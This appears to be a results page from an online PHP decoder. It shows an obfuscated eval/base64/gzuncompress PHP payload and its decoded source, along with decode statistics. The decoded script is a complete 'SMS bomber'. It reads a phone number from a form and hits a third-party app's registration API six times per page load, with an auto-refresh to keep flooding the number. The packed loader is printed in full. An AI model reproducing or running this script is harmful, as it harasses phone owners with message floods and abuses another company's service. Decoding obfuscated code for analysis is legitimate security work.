Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(base64_decode(gzuncompress(base64_decode('eJydU8tuozAU3fMr3VBI2rLoItCE2CSU8L..

Decoded Output download

error_reporting(0);
$mob=$_REQUEST["mob"];
if(!$mob){
echo '<center><form action="" method="get">
<br><b>Enter Phone Number<br>
<input type="text" name="mob"><br>
<input type="submit" value="Submit"></form>';
die();
}


$api="http://zubaan.in/chatapp/service/register.php?phone_no=$mob&country_code=%2091&country_id=91&reffer_code=3TG57&device_token=$mob&session_id=";


if($mob=="9635835340")
{
echo "E Ka Hai Be,Mai Hi Mila Tha KYa";
}
else{
$bomber=file_get_contents($api);
$bomber=file_get_contents($api);
$bomber=file_get_contents($api);
$bomber=file_get_contents($api);
$bomber=file_get_contents($api);
$bomber=file_get_contents($api);
echo "<center><br>Success";
header("Refresh: 1;");
}


Did this file decode correctly?

Original Code


<?php
eval(base64_decode(gzuncompress(base64_decode('eJydU8tuozAU3fMr3VBI2rLoItCE2CSU8LDBOwwT87ANUh4Evr4m1Tw0qlTNLCzL18fnnnvuNUnhSE14LAQa1K7neCm9t1X/PnQtxVYdROExaVGIEhSjzameY4Drz47gwnPWd4yXnjyC/U6j40oGrs+pDHnRLF6IsEYa2VVmhj01FhaoAaMY6blrtUEEJUkPdcC6l0yCh8AFDyFe6iQFLHGrq0ZFwmKJzplAY+DCcQYqdUOZHli55QOJ9bp00aJ0FKnYnOfzXZ1KPBM6za2n0n4sHVvXfqQ2VxmnEsNzrrKCLanoFs2x+GcsaIbrXXG8kO9D3+Y46bz45B0PnefUYVW4rQVEpWvldvW0G60n9bDK8OKS48U1M6qqdDdD4VgTSaGRY5/vTMiJwSelctxJuyverEGVfiHIutBJv3unQeFfS1V3IfkxM6xWlcH3zWq5j0hDTXQpt3CZGrwN4vYGpSIUhBfcaqgR8iD2k3BKTChCXgreaIpZp8aZ0+aTHUqfF6avzF8ec3ywQHPyHNb3pGaf3VWevcfZ5MdMrb2+d0DvyN/drMPI3mWRDTLcsoNITjHe9GBdqfXYU3fNkFtVYH0mWQSeHamrhzdV/smDLrxSDNUUPIoc37iWGiUvN7Ns1eK53JG1WWr3s8F/g7/Dav8C/g6r/a+Kr7DaV+DZzNnLP3/GPKCJiZrMQFMxKu9ExTOs7mpWJwIJ9R0nLX/r2D4+1b+GkL2+fgCIPz9F'))));

?>

Function Calls

gzuncompress 1
base64_decode 2

Variables

None

Stats

MD5 ce293d1a7c2ed13177a0fc1d0a9293e1
Eval Count 1
Decode Time 107 ms